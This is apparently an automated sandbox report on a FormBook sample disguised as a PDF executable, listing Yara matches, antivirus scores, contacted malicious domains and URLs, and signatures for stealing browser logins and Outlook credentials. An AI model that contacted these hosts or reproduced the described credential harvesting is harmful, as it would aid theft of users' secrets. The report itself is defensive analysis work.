Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

Code function: 0_2_00007FF7D7860860 GetSystemTimeAsFileTime,

0_2_00007FF7D7860860

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\ipconfig.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\ipconfig.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
204.11.56.48	www.landfillequip.com	Virgin Islands (BRITISH)		40034	CONFLUENCE-NETWORK-INCVG	true

Contacted Domains

Name	IP	Active
www.landfillequip.com	204.11.56.48	true
shearwaterpembrokeshire.com	3.33.130.190	true
www.mrawkward.xyz	unknown	unknown
www.n5l780.com	unknown	unknown
www.cq0jt.sbs	unknown	unknown
www.hhe-crv220.com	unknown	unknown
www.kickssoccercamp.com	unknown	unknown
www.a2zglobalimports.com	unknown	unknown
www.shearwaterpembrokeshire.com	unknown	unknown
www.sejasuapropriachefe.com	unknown	unknown
www.icvp5o.xyz	unknown	unknown
www.bedbillionaire.com	unknown	unknown
www.sacksmantenimiento.store	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.a2zglobalimports.com/kmge/	true	10%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.landfillequip.com/kmge/	true	Avira URL Cloud: safe	unknown

AV Detection

Antivirus detection for URL or domain

Source: www.a2zglobalimports.com/kmge/	Avira URL Cloud: Label: malware
Source: http://www.hhe-crv220.com/kmge/www.sacksmantenimiento.store	Avira URL Cloud: Label: malware
Source: http://www.cq0jt.sbs	Avira URL Cloud: Label: malware
Source: http://www.kickssoccercamp.com	Avira URL Cloud: Label: malware
Source: http://www.hhe-crv220.com/kmge/	Avira URL Cloud: Label: malware
Source: http://www.agritamaperkasaindonesia.com	Avira URL Cloud: Label: malware
Source: http://www.icvp5o.xyz	Avira URL Cloud: Label: malware
Source: http://www.sacksmantenimiento.store/kmge/	Avira URL Cloud: Label: malware
Source: http://www.bedbillionaire.com/kmge/www.mrawkward.xyz	Avira URL Cloud: Label: malware
Source: http://www.a2zglobalimports.com/kmge/www.shearwaterpembrokeshire.com	Avira URL Cloud: Label: malware
Source: http://www.sacksmantenimiento.store/kmge/www.a2zglobalimports.com	Avira URL Cloud: Label: malware
Source: http://www.cq0jt.sbs/kmge/www.hhe-crv220.com	Avira URL Cloud: Label: malware
Source: http://www.hhe-crv220.com	Avira URL Cloud: Label: malware
Source: http://www.sacksmantenimiento.store	Avira URL Cloud: Label: malware
Source: http://www.gsolartech.com/kmge/	Avira URL Cloud: Label: malware
Source: http://www.kickssoccercamp.com/kmge/	Avira URL Cloud: Label: malware
Source: http://www.bedbillionaire.com/kmge/	Avira URL Cloud: Label: malware
Source: http://www.icvp5o.xyz/kmge/	Avira URL Cloud: Label: malware
Source: http://www.bedbillionaire.com	Avira URL Cloud: Label: malware
Source: http://www.a2zglobalimports.com	Avira URL Cloud: Label: malware
Source: http://www.icvp5o.xyz/kmge/www.bedbillionaire.com	Avira URL Cloud: Label: malware
Source: http://www.kickssoccercamp.com/kmge/www.cq0jt.sbs	Avira URL Cloud: Label: malware
Source: http://www.a2zglobalimports.com/kmge/	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp

Multi AV Scanner detection for domain / URL

Source: www.mrawkward.xyz	Virustotal: Detection: 8%	Perma Link
Source: www.hhe-crv220.com	Virustotal: Detection: 7%	Perma Link
Source: www.icvp5o.xyz	Virustotal: Detection: 9%	Perma Link
Source: www.kickssoccercamp.com	Virustotal: Detection: 6%	Perma Link
Source: www.sacksmantenimiento.store	Virustotal: Detection: 8%	Perma Link
Source: www.cq0jt.sbs	Virustotal: Detection: 10%	Perma Link
Source: www.n5l780.com	Virustotal: Detection: 5%	Perma Link
Source: www.bedbillionaire.com	Virustotal: Detection: 9%	Perma Link
Source: http://www.mrawkward.xyz	Virustotal: Detection: 8%	Perma Link
Source: www.a2zglobalimports.com/kmge/	Virustotal: Detection: 9%	Perma Link
Source: http://www.cq0jt.sbs	Virustotal: Detection: 10%	Perma Link
Source: http://www.kickssoccercamp.com	Virustotal: Detection: 6%	Perma Link
Source: http://www.mrawkward.xyz/kmge/	Virustotal: Detection: 9%	Perma Link
Source: http://www.hhe-crv220.com/kmge/	Virustotal: Detection: 9%	Perma Link
Source: http://www.n5l780.com/kmge/www.szexvideokingyen.sbs	Virustotal: Detection: 6%	Perma Link
Source: http://www.n5l780.com/kmge/	Virustotal: Detection: 9%	Perma Link
Source: http://www.sejasuapropriachefe.com/kmge/	Virustotal: Detection: 6%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\101 2043 5770 pdf.exe

ReversingLabs: Detection: 31%

Multi AV Scanner detection for submitted file

Source: 101 2043 5770 pdf.exe	ReversingLabs: Detection: 31%
Source: 101 2043 5770 pdf.exe	Virustotal: Detection: 16%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: 101 2043 5770 pdf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: ipconfig.pdb source: csc.exe, 00000006.00000002.2188747951.00000000054D8000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2188945268.0000000005830000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000009.00000002.4584574115.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: firefox.pdbP source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ipconfig.pdbGCTL source: csc.exe, 00000006.00000002.2188747951.00000000054D8000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2188945268.0000000005830000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4584574115.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: cmmon32.pdb source: cmmon32.exe, 00000018.00000002.2315834877.0000000000C90000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: cmmon32.pdbGCTL source: cmmon32.exe, 00000018.00000002.2315834877.0000000000C90000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: csc.exe, 00000006.00000003.2122937679.00000000055DD000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000003.2125210972.000000000578A000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4592690985.0000000003590000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2188668887.000000000322F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2190345927.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4592690985.000000000372E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2307893156.000000000493D000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000002.2316929449.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp, 